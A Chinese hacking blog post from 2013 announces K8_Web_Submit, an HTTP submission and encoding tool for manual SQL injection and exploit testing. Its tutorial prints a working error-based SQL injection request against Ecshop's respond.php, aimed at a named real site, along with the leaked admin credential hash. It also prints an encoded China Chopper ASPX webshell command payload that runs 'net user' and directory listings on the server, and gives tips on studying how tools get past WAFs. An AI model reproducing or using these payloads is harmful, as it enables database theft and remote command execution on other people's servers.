注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[原创]K8_Web_Submit 1.0(已改名K8飞刀) 综合Web提交工具(手工注入或测试相关EXP专用)  

2013-03-15 03:35:35|  分类: 原创工具 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
程序: K8_Web_Submit (Web提交工具)
编译: VS2010  C# (.NET Framework v2.0)
组织: K8搞基大队[K8team]
作者: K8拉登哥哥
博客: http://qqhack8.blog.163.com
发布: 2013-3-15 3:20:53

简介: 一个综合的Web提交工具(手工注入或测试相关EXP专用)
[原创]K8_Web_Submit 1.0 一个综合的Web提交工具(手工注入或测试相关EXP专用) - 拉登哥哥 - K8拉登哥哥s Blog
 
Submit (提交)
============================================================================================================
1     Method: 提交方式 Get或Post
2 User Agent: (比如为造成IE firfox 手机浏览器 等等浏览器来提交数据)
3    Timeout: 超时设置
4    Endoing: 设置指定编码提交数据(默认为UTF-8 Get方式可自动判断Web编码来提交)
5       Data: 要Get或Post的数据
6     Result: 返回结果
7       Test: 测试 可以自己去抓下什么菜刀啊 看看它提交啥数据(小提示 菜刀使用Base64加密)
              抓下 Sqlmap havij啊 的包 看看人家是什么绕过WAF的 可以改下数据包 在提交
              看看返回什么 方便你手工注入 或者 编写类似菜刀或者相关注入工具...
============================================================================================================

Coding (编码)
============================================================================================================
Encode (加密)

[+] MD5_Encode_32   MD5_32位加密
[+] MD5_Encode_16   MD5_16位加密
[+] Base64_Encode   Base64加密
[+] Ascii_Encode    Ascii码加密
[+] Ascii_Sum       Ascii码之和
[+] String2Hex      字符串转16进制 (sql注入常用 那什么load_file 库名 表名列名的转换 记得在前面加上0x)
[+] URL_Encode      URL编码
[+] URL_Path_16     16进制URL路径 (什么DB权限拿Shell 那物里路径的转换)
[+] Oracle_CHR()    Oracle注入CHR编码转换
[+] MSSQL_CHR()     MsSql注入CHR编码转换
[+] MYSQL_CHR()     MySql注入CHR编码转换

============================================================================================================
Decode (解密)

[+] Base64Decode     Base64解密
[+] Hex2String       16进制转字符串(抓下sqlmap或havij的包 去掉前面那个0x 然后再解密看看 它提交的是啥玩意)
解密这 还有很多等有时间再慢慢加上
============================================================================================================

 
[原创]K8_Web_Submit 1.0 一个综合的Web提交工具(手工注入或测试相关EXP专用) - 拉登哥哥 - K8拉登哥哥s Blog
 
下载地址:
MD5: 7685513B4A380BEB51264EA595F8A251
SHA1: AA9E71EE45FBF4202E39D6197BC4BCF0C6AD1D54
http://qqhack8.blog.163.com/blog/static/114147985201532521135461/

动画教程下载:http://pan.baidu.com/share/link?shareid=382792&uk=2785594607

注意: 在K8拉登哥哥BLOG里下载文件 老版本下载地址随时失效 请点最新的链接地址

教程内容:

相信大家还记得前几天 写的Ecshop EXP

抓包 看它提交的数据

POST /respond.php?code=alipay&subject=0&out_trade_no=%00'%20and%20(select%20*%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20shop_admin_user%20limit%201))a%20from%20information_schema.tables%20group%20by%20a)fuck)%20--%20By%20fuck HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://cn.ju027.com/respond.php?code=alipay&subject=0&out_trade_no=%00'%20and%20(select%20*%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(user_name,password)%20from%20shop_admin_user%20limit%201))a%20from%20information_schema.tables%20group%20by%20a)fuck)%20--%20By%20fuck
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MAXTHON 2.0)
Host: cn.ju027.com
Content-Length: 0
Connection: Keep-Alive

1 接下来 我们在使用工具提交(SQL注入)

Target: http://cn.ju027.com

Method: Post2

            [error] => Duplicate entry '1adminb010243965aec306bbc2ad35c9f498db' for key 'group_key'

看一样是可以爆出管理员帐号

2 我们在使用工具连接菜刀一句话
下面演示下 利用这工具给菜刀的一句话 提交数据

本教程演示执行cmd命令过程

这上堆数据是 抓取菜刀提交的数据

菜刀用的是Base64加密 我们要用的时候 先解密 再加密 后给他提交回去

看到了吗 这样 实际上我们花点时间 自己也可以写出和菜刀一样或更强的工具

这里只演示连接ASPX 不代表只能连ASPX啊 工具 这里要提交的数据 网址等 全都可自定义

菜刀连接ASPX一句话的代码
?password=Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=Y21k&z2=Y2QgL2QgIkM6XHd3d1wiJm5ldCB1c2VyJmVjaG8gW1NdJmNkJmVjaG8gW0Vd

3 手工注入时的 常用到的编码转换

和 hackbar 上面是一样的

MD5加密 BASE64加密 ASCII码等等

路径转换成 PHP load_file或 mssql DB权限时导出 要用到的 16进制路径转换 等等

更多功能 等以后 我想到了 慢慢加上

88
  评论这张
 
阅读(4278)| 评论(4)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016